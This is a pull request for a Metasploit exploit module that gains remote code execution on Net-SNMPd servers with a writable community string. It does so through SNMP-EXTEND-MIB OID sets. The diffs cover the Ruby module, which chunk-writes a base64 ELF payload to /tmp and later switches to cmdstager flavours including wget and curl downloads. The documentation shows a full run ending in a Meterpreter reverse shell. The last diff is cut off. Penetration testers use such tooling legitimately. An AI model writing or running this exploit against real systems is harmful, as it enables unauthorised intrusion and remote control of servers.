### PR TITLE
Linux net snmpd rw access

### DIFF
--- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
+++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
@@ -110,11 +110,10 @@
   [*] Command Stager progress -  98.64% done (17681/17924 bytes)
   [*] Command Stager progress -  99.72% done (17873/17924 bytes)
   [*] Sending stage (857352 bytes) to 192.168.1.3
-  [*] Meterpreter session 30 opened (192.168.1.2:4444 -> 192.168.1.3:54230) at 2018-02-14 16:52:49 +0000
-  [-] Exploit failed: SNMP::RequestTimeout host 192.168.1.3 not responding
-  [*] Exploit completed, but no session was created.
-  msf exploit(linux/snmp/net_snmpd_rw_access) > sessions -i 30 
-  [*] Starting interaction with 30...
+  [*] Meterpreter session 31 opened (192.168.1.2:4444 -> 192.168.1.3:54232) at 2018-02-14 17:30:22 +0000
+  [+] SNMP request timeout (this is promising).
+  [*] Command Stager progress - 100.00% done (18022/18022 bytes)
+
   
   meterpreter > getuid
   Server username: uid=121, gid=129, euid=121, egid=129

--- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
+++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
@@ -15,13 +15,24 @@
   8. You should get a session
 
 ## Options
-  This module accepts 'RHOST' and 'RPORT' to specify target address and port respectively.  
-  'FILEPATH' specifies where to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.  
-  'COMMUNITY' is a read/write community string of the target Net-SNMP service.  
-  'VERSION' selects the SNMP protocol version. Accepted values are '1' or '2c'.  
-  'CHUNKSIZE' is the maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.  
-  'TIMEOUT' specifies the maximum time to allow SNMP to timeout.
+  **FILEPATH** 
+  The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.  
 
+  **COMMUNITY** 
+  The read/write community string of the target Net-SNMP service.
+
+  **VERSION**
+  The SNMP protocol version. Accepted values are '1' or '2c'. 
+  
+  
+  **CHUNKSIZE**
+  The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.  
+  Note that cmdstager payloads are modified to allow further escaping, so the values limits may change between cmdstager flavors.  
+  Possibly related to: [https://sourceforge.net/p/net-snmp/bugs/2542/]
+  **TIMEOUT** 
+  Specifies the maximum time to allow SNMP to timeout.
+
+  
 ## Scenario
 
   ```
@@ -63,9 +74,15 @@
     FILEPATH   /tmp             yes       file path to write to 
     RETRIES    1                yes       SNMP Retries
     RHOST      192.168.1.3      yes       The target address
-    RPORT      161              yes       The target port (UDP)
+    RPORT      161              yes       The target port (TCP)
+    SHELL      /bin/bash        yes       Shell to call with -c argument
+    SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+    SRVPORT    8080             yes       The local port to listen on.
+    SSL        false            no        Negotiate SSL for incoming connections
+    SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
     TIMEOUT    1                yes       SNMP Timeout
-    VERSION    2c               yes       SNMP Version <1/2c>
+    URIPATH                     no        The URI to use for this exploit (default is random)
+    VERSION    2c               yes       SNMP Version <1/2c> 
 
   Payload information:
     Space: 4096
@@ -79,16 +96,25 @@
     https://www.intelisecure.com
 
   msf exploit(linux/snmp/net_snmpd_rw_access) > run
-
+  
   [*] Started reverse TCP handler on 192.168.1.2:4444 
-  [*] Writing to NET-SNMP-EXTEND-MIB with given payload
-  [*] Payload generated. Sending in 200 byte chunk increments.
-  [*] Sent chunked executable. Now executing payload
-  [*] Sending stage (849108 bytes) to 192.168.1.3
-  [+] SNMP request timeout (this is promising).
-
+  [*] Command Stager progress -   1.11% done (199/17924 bytes)
+  [*] Command Stager progress -   2.23% done (399/17924 bytes)
+  [*] Command Stager progress -   3.34% done (598/17924 bytes)
+  [*] Command Stager progress -   4.45% done (797/17924 bytes)
+  ... Redacted ...
+  [*] Command Stager progress -  98.64% done (17681/17924 bytes)
+  [*] Command Stager progress -  99.72% done (17873/17924 bytes)
+  [*] Sending stage (857352 bytes) to 192.168.1.3
+  [*] Meterpreter session 30 opened (192.168.1.2:4444 -> 192.168.1.3:54230) at 2018-02-14 16:52:49 +0000
+  [-] Exploit failed: SNMP::RequestTimeout host 192.168.1.3 not responding
+  [*] Exploit completed, but no session was created.
+  msf exploit(linux/snmp/net_snmpd_rw_access) > sessions -i 30 
+  [*] Starting interaction with 30...
+  
+  meterpreter > getuid
+  Server username: uid=121, gid=129, euid=121, egid=129
   meterpreter > exit
-  [*] Shutting down Meterpreter...
- 
-  [*] 192.168.1.3 - Meterpreter session 1 closed.  Reason: User exit
+  [*] 192.168.1.3 - Meterpreter session 30 closed.  Reason: User exit
+
   ```

--- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
+++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
@@ -10,12 +10,12 @@
   3. Do: `set rhost [IP]`
   4. Do: `set community [SNMP Community]`
   5. Do: `set version [SNMP Version]`
-  4. Configure the payload
-  5. Do: `run`
-  6. You should get a session
+  6. Configure the payload
+  7. Do: `run`
+  8. You should get a session
 
 
-## Example Run
+## Scenario
 
   ```
   msf > use exploit/linux/snmp/net_snmpd_rw_access 

--- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
+++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
@@ -15,11 +15,11 @@
   8. You should get a session
 
 ## Options
-  This module accepts 'RHOST' and 'RPORT' to specify target address and port respectively.
-  'FILEPATH' specifies where to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp
-  'COMMUNITY' is a read/write community string of the target Net-SNMP service
-  'VERSION' selects the SNMP protocol version. Accepted values are '1' or '2c'
-  'CHUNKSIZE' is the maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.
+  This module accepts 'RHOST' and 'RPORT' to specify target address and port respectively.  
+  'FILEPATH' specifies where to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.  
+  'COMMUNITY' is a read/write community string of the target Net-SNMP service.  
+  'VERSION' selects the SNMP protocol version. Accepted values are '1' or '2c'.  
+  'CHUNKSIZE' is the maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.  
   'TIMEOUT' specifies the maximum time to allow SNMP to timeout.
 
 ## Scenario

--- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
+++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
@@ -25,12 +25,16 @@
   The SNMP protocol version. Accepted values are '1' or '2c'. 
   
   **CHUNKSIZE**  
-  The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.  
-  Note that cmdstager payloads are modified to allow further escaping, so the values limits may change between cmdstager flavors.  
-  Possibly related to: [https://sourceforge.net/p/net-snmp/bugs/2542/]
+  The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments, but should hopefully work for all cmdstager flavors  
+  Note that cmdstager payloads are modified to allow further escaping, so the values limits may also change between cmdstager flavors.  
+  This is possibly related to the following bug: [https://sourceforge.net/p/net-snmp/bugs/2542/].
   
   **TIMEOUT**  
-  Specifies the maximum time to allow SNMP to timeout.
+  Specifies the maximum time to allow SNMP to timeout.  
+  
+  **SHELL**  
+  The shell to call for the client. Defaults to '/bin/bash'  
+
 
   
 ## Scenario

--- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
+++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
@@ -15,21 +15,21 @@
   8. You should get a session
 
 ## Options
-  **FILEPATH** 
+  **FILEPATH**  
   The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.  
-
-  **COMMUNITY** 
+  
+  **COMMUNITY**  
   The read/write community string of the target Net-SNMP service.
-
-  **VERSION**
+  
+  **VERSION**  
   The SNMP protocol version. Accepted values are '1' or '2c'. 
   
-  
-  **CHUNKSIZE**
+  **CHUNKSIZE**  
   The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.  
   Note that cmdstager payloads are modified to allow further escaping, so the values limits may change between cmdstager flavors.  
   Possibly related to: [https://sourceforge.net/p/net-snmp/bugs/2542/]
-  **TIMEOUT** 
+  
+  **TIMEOUT**  
   Specifies the maximum time to allow SNMP to timeout.
 
   

--- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
+++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
@@ -14,6 +14,13 @@
   7. Do: `run`
   8. You should get a session
 
+## Options
+  This module accepts 'RHOST' and 'RPORT' to specify target address and port respectively.
+  'FILEPATH' specifies where to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp
+  'COMMUNITY' is a read/write community string of the target Net-SNMP service
+  'VERSION' selects the SNMP protocol version. Accepted values are '1' or '2c'
+  'CHUNKSIZE' is the maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.
+  'TIMEOUT' specifies the maximum time to allow SNMP to timeout.
 
 ## Scenario
 

--- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
+++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
@@ -1,0 +1,87 @@
+## Vulnerable Application
+
+  This module uses SNMP extension MIBs to enable remote code execution on the Linux Net-SNMPD servers using the 
+  SNMP-EXTEND-MIB.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/snmp/net_snmpd_rw_access`
+  3. Do: `set rhost [IP]`
+  4. Do: `set community [SNMP Community]`
+  5. Do: `set version [SNMP Version]`
+  4. Configure the payload
+  5. Do: `run`
+  6. You should get a session
+
+
+## Example Run
+
+  ```
+  msf > use exploit/linux/snmp/net_snmpd_rw_access 
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set rhost 192.168.1.3
+  rhost => 192.168.1.3
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set lhost 192.168.1.2
+  lhost => 192.168.1.2
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set community private
+  community => private
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set version 2c
+  version => 2c
+
+  msf exploit(linux/snmp/net_snmpd_rw_access) > show info
+  
+         Name: Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution
+       Module: exploit/linux/snmp/net_snmpd_rw_access
+     Platform: 
+         Arch: 
+   Privileged: No
+      License: Metasploit Framework License (BSD)
+         Rank: Normal
+
+  Provided by:
+    Steve Embling at InteliSecure
+
+  Available targets:
+    Id  Name
+    --  ----
+    0   Linux x86
+
+  Basic options:
+    Name       Current Setting  Required  Description
+    ----       ---------------  --------  -----------
+    CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
+    COMMUNITY  private          yes       SNMP Community String
+    FILEPATH   /tmp             yes       file path to write to 
+    RETRIES    1                yes       SNMP Retries
+    RHOST      192.168.1.3      yes       The target address
+    RPORT      161              yes       The target port (UDP)
+    TIMEOUT    1                yes       SNMP Timeout
+    VERSION    2c               yes       SNMP Version <1/2c>
+
+  Payload information:
+    Space: 4096
+
+  Description:
+    This exploit module exploits the SNMP write access configuration 
+    ability of SNMP-EXTEND-MIB to configure MIB extensions and lead to 
+    remote code execution.
+
+  References:
+    https://www.intelisecure.com
+
+  msf exploit(linux/snmp/net_snmpd_rw_access) > run
+
+  [*] Started reverse TCP handler on 192.168.1.2:4444 
+  [*] Writing to NET-SNMP-EXTEND-MIB with given payload
+  [*] Payload generated. Sending in 200 byte chunk increments.
+  [*] Sent chunked executable. Now executing payload
+  [*] Sending stage (849108 bytes) to 192.168.1.3
+  [+] SNMP request timeout (this is promising).
+
+  meterpreter > exit
+  [*] Shutting down Meterpreter...
+ 
+  [*] 192.168.1.3 - Meterpreter session 1 closed.  Reason: User exit
+  ```

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -24,8 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author'         => ['Steve Embling at InteliSecure'],
         'References'     =>
           [
-            [ 'URL', 'http://net-snmp.sourceforge.net/docs/mibs/NET-SNMP-EXTEND-MIB.txt' ],
-            [ 'URL', 'https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/sect-system_monitoring_tools-net-snmp-extending'],
+            [ 'URL', 'http://net-snmp.sourceforge.net/docs/mibs/NET-SNMP-EXTEND-MIB.txt'],
+            [ 'URL', 'https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e'],
+            [ 'URL', 'https://digi.ninja/blog/snmp_to_shell.php'],
             [ 'URL', 'https://sourceforge.net/p/net-snmp/mailman/message/15735617/']
           ],
         'Payload'        =>

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def exploit
     payload_name = "#{rand_text_alpha(5)}"
-    full_path = datastore['FILEPATH'] + '/' + @payload_name
+    full_path = datastore['FILEPATH'] + '/' + payload_name
     payload_exe = Rex::Text.encode_base64(generate_payload_exe)
     if payload_exe.blank?
       fail_with(Failure::BadConfig, "Failed to generate the ELF, select a native payload")

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'Payload'        =>
           {
-            'Space'    => 4096, #arbitrary, but it seems to max out the size
+            'Space'    => 4096 #arbitrary, but it seems to max out the size
             #'BadChars' => "\x00"
           },
         'Targets'        =>

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -65,7 +65,6 @@ class MetasploitModule < Msf::Exploit::Remote
   # NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable
   # NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments
   def execute_command(cmd, opts = {})
-    # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
     oid_1 = '1.3.6.1.4.1.8072.1.3.2.2.1.21.3.116.109.112'
     oid_1_value = 4
     oid_2 = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112'
@@ -75,9 +74,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     comm = datastore['COMMUNITY']
     oid_3_value = "-c \"#{cmd}\""
+    if flavor == :echo
+      #Add additional escaping for this flavour.
+      command = cmd.gsub('\\\\x', '\\\\\\\\\\\\\\\\x')
+      oid_3_value = "-c \"#{command}\""
+    end
+    if flavor == :printf
+      #Add additional escaping for this flavour.
+      command = cmd.gsub('\\', '\\\\\\\\\\')
+      oid_3_value = "-c \"#{command}\""
+    end
     vprint_status(oid_3_value)
     SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
-      vprint_status(manager.get_value("sysDescr.0"))
+      #vprint_status(manager.get_value("sysDescr.0"))
       varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
       varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
       varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::SNMPClient
-  include Msf::Exploit::EXE
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -34,9 +34,17 @@ class MetasploitModule < Msf::Exploit::Remote
           },
         'Targets'        =>
         [
-          ['Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+          ['Linux x86', { 
+              'Arch' => ARCH_X86, 
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget ]}],
+          ['Linux x64', { 
+              'Arch' => ARCH_X86_64, 
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => [ :echo, :printf, :bourne ]}]
+          ],
           #Not tested on other platforms but confirmed the above works.
-        ],
+        
         #'DisclosureDate' => "Dec 22 2017",
         'DefaultTarget'  => 0,
       )
@@ -44,7 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('FILEPATH', [true, 'file path to write to ', '/tmp']),
-        OptString.new('CHUNKSIZE', [true, 'Maximum bytes of payload to write at once ', 200])
+        OptString.new('CHUNKSIZE', [true, 'Maximum bytes of payload to write at once ', 200]),
+        OptString.new('SHELL', [true, 'Shell to call with -c argument', '/bin/bash'])
       ])
   end
 
@@ -52,80 +61,41 @@ class MetasploitModule < Msf::Exploit::Remote
     Exploit::CheckCode::Unsupported
   end
 
-  #
   # The exploit method connects and sets:
   # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
   # NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable
   # NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments
-  #
-  def exploit
-    payload_name = "#{rand_text_alpha(5)}"
-    full_path = datastore['FILEPATH'] + '/' + payload_name
-    payload_exe = Rex::Text.encode_base64(generate_payload_exe)
-    if payload_exe.blank?
-      fail_with(Failure::BadConfig, "Failed to generate the ELF, select a native payload")
-    end
-    print_status("Writing to NET-SNMP-EXTEND-MIB with given payload")
-    comm     = datastore['COMMUNITY'].to_s
+  def execute_command(cmd, opts = {})
     # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
     oid_1 = '1.3.6.1.4.1.8072.1.3.2.2.1.21.3.116.109.112'
     oid_1_value = 4
     oid_2 = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112'
-    oid_2_value = "/bin/bash"
+    oid_2_value =  datastore['SHELL']
     oid_3 = '1.3.6.1.4.1.8072.1.3.2.2.1.3.3.116.109.112'
     oid_4 = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'
-    i = 0
-    #vprint_status(payload_exe)
-    chunk_size = datastore['CHUNKSIZE']
-    chunk_size = chunk_size.to_i
-    print_status("Payload generated. Sending in #{chunk_size} byte chunk increments.")
-    while i <= payload_exe.length
-      ii = i + chunk_size
-      if ii > payload_exe.length
-        ii = -1
-      end
-      vprint_status("#{i} #{ii}")
-      oid_3_value = "-c \"printf '#{payload_exe[i..ii]}' >> #{full_path}.1\""
-      vprint_status(oid_3_value)
-      SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
-          vprint_status(manager.get_value("sysDescr.0"))
-          varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
-          varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
-          varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
-          resp = manager.set([varbind1, varbind2, varbind3])
-          vprint_status(manager.get_value(oid_4).to_s)
-      end
-      #Hit same again, first rewrite  appears to remove the MIB, the next reinstates it.
-      SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
-          varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
-          varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
-          varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
-          resp = manager.set([varbind1, varbind2, varbind3])
-          vprint_status(manager.get_value(oid_4).to_s)
-      end
-      i = i + chunk_size + 1
-    end
-    print_status("Sent chunked executable. Now executing payload")
-    #base64 may not be required here and might not be available on all platforms
-    oid_3_value = "-c \"cat #{full_path}.1 | base64 -d > #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};rm {full_path}.1\"" #
+
+    comm = datastore['COMMUNITY']
+    oid_3_value = "-c \"#{cmd}\""
     vprint_status(oid_3_value)
     SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
-       varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
-       varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
-       varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
-       resp = manager.set([varbind1, varbind2, varbind3])
-       begin
-         status = manager.get_value(oid_4).to_s
-         if status == "noSuchInstance"
-           resp = manager.set([varbind1, varbind2, varbind3])
-           status = manager.get_value(oid_4).to_s
-           print_bad("SNMP is still responsive, this does not look good")
-         end
-         print_status(status)
-       rescue SNMP::RequestTimeout
-         print_good("SNMP request timeout (this is promising).")
-       end
+      vprint_status(manager.get_value("sysDescr.0"))
+      varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
+      varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
+      varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
+      resp = manager.set([varbind1, varbind2, varbind3])
+      vprint_status(manager.get_value(oid_4).to_s)
     end
-    handler
+    #Hit same again, first rewrite  appears to remove the MIB, the next reinstates it.
+    SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
+      varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
+      varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
+      varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
+      resp = manager.set([varbind1, varbind2, varbind3])
+      vprint_status(manager.get_value(oid_4).to_s)
+    end
+  end
+
+  def exploit
+    execute_cmdstager(linemax: datastore['CHUNKSIZE'].to_i, :temp => datastore['FILEPATH'])
   end
 end

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux',
               'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget ]}],
           ['Linux x64', { 
-              'Arch' => ARCH_X86_64, 
+              'Arch' => ARCH_X64, 
               'Platform' => 'linux',
               'CmdStagerFlavor' => [ :echo, :printf, :bourne ]}]
           ],

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments
   #
   def exploit
-    @payload_name = "#{rand_text_alpha(5)}"
+    payload_name = "#{rand_text_alpha(5)}"
     full_path = datastore['FILEPATH'] + '/' + @payload_name
     payload_exe = Rex::Text.encode_base64(generate_payload_exe)
     if payload_exe.blank?

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -37,11 +37,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ['Linux x86', {
               'Arch' => ARCH_X86,
               'Platform' => 'linux',
-              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget ]}],
+              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]}],
           ['Linux x64', {
               'Arch' => ARCH_X64,
               'Platform' => 'linux',
-              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget ]}]
+              'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]}]
           ],
           #Not tested on other platforms but confirmed the above works.
         #'DisclosureDate' => "Dec 22 2017",
@@ -73,17 +73,16 @@ class MetasploitModule < Msf::Exploit::Remote
     oid_4 = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'
 
     comm = datastore['COMMUNITY']
-    oid_3_value = "-c \"#{cmd}\""
     if flavor == :echo
       #Add additional escaping for this flavour.
-      command = cmd.gsub('\\\\x', '\\\\\\\\\\\\\\\\x')
-      oid_3_value = "-c \"#{command}\""
+      cmd.gsub!('\\\\x', '\\\\\\\\\\\\\\\\x')
     end
     if flavor == :printf
       #Add additional escaping for this flavour.
-      command = cmd.gsub('\\', '\\\\\\\\\\')
-      oid_3_value = "-c \"#{command}\""
+      cmd.gsub!('\\', '\\\\\\\\\\')
     end
+    oid_3_value = "-c \"#{cmd}\""
+
     vprint_status(oid_3_value)
     SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
       #vprint_status(manager.get_value("sysDescr.0"))

--- a/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
+++ b/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
@@ -1,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'snmp'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution',
+        'Description'    => %q(
+            This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to
+ configure MIB extensions and lead to remote code execution.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => ['Steve Embling at InteliSecure'],
+        'References'     =>
+          [
+            [ 'URL', 'https://www.intelisecure.com']
+          ],
+        'Payload'        =>
+          {
+            'Space'    => 4096, #arbitrary, but it seems to max out the size
+            #'BadChars' => "\x00"
+          },
+        'Targets'        =>
+        [
+          ['Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+          #Not tested on other platforms but confirmed the above works.
+        ],
+        #'DisclosureDate' => "Dec 22 2017",
+        'DefaultTarget'  => 0,
+      )
+    )
+    register_options(
+      [
+        OptString.new('FILEPATH', [true, 'file path to write to ', '/tmp']),
+        OptString.new('CHUNKSIZE', [true, 'Maximum bytes of payload to write at once ', 200])
+      ])
+  end
+
+  def check
+    Exploit::CheckCode::Unsupported
+  end
+
+  #
+  # The exploit method connects and sets:
+  # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
+  # NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable
+  # NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments
+  #
+  def exploit
+    @payload_name = "#{rand_text_alpha(5)}"
+    full_path = datastore['FILEPATH'] + '/' + @payload_name
+    payload_exe = Rex::Text.encode_base64(generate_payload_exe)
+    if payload_exe.blank?
+      fail_with(Failure::BadConfig, "Failed to generate the ELF, select a native payload")
+    end
+    print_status("Writing to NET-SNMP-EXTEND-MIB with given payload")
+    comm     = datastore['COMMUNITY'].to_s
+    # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
+    oid_1 = '1.3.6.1.4.1.8072.1.3.2.2.1.21.3.116.109.112'
+    oid_1_value = 4
+    oid_2 = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112'
+    oid_2_value = "/bin/bash"
+    oid_3 = '1.3.6.1.4.1.8072.1.3.2.2.1.3.3.116.109.112'
+    oid_4 = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'
+    i = 0
+    #vprint_status(payload_exe)
+    chunk_size = datastore['CHUNKSIZE']
+    chunk_size = chunk_size.to_i
+    print_status("Payload generated. Sending in " + chunk_size.to_s + " byte chunk increments.")
+    while i <= payload_exe.length
+      ii = i + chunk_size
+      if ii > payload_exe.length
+        ii = -1
+      end
+      vprint_status(i.to_s + " " + ii.to_s)
+      oid_3_value = "-c \"printf \'"+ payload_exe[i..ii]+"\' >> #{full_path}.1\""
+      vprint_status(oid_3_value)
+      SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
+          vprint_status(manager.get_value("sysDescr.0"))
+          varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
+          varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
+          varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
+          resp = manager.set([varbind1, varbind2, varbind3])
+          vprint_status(manager.get_value(oid_4).to_s)
+      end
+      #Hit same again, first rewrite  appears to remove the MIB, the next reinstates it.
+      SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
+          varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
+          varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
+          varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
+          resp = manager.set([varbind1, varbind2, varbind3])
+          vprint_status(manager.get_value(oid_4).to_s)
+      end
+      i = i + chunk_size + 1
+    end
+    print_status("Sent chunked executable. Now executing payload")
+    #base64 may not be required here and might not be available on all platforms
+    oid_3_value = "-c \"cat #{full_path}.1 | base64 -d > #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};rm {full_path}.1\"" #
+    vprint_status(oid_3_value)
